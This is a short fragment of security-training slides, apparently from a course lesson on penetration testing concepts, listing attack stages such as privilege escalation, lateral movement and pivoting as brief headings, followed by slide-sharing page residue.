Reconnect across host shut down/user log off events
Privilege escalation
Internal reconnaissance
Gain additional credentials and compromise higher privilege
accounts
Lateral movement
Compromise other hosts
Pivoting
Access hosts with no direct remote connection via a pivot host
Actions on objectives
Cleanup
44
Penetration Testing Concepts

45
Review Activity
Summary
Lesson 3
46
46

Comparing Security Roles and Security Controls Lesson 1

More Related Content

Similar to Comparing Security Roles and Security Controls Lesson 1 (20)

More from LynellBull52 (20)

Recently uploaded (20)

Comparing Security Roles and Security Controls Lesson 1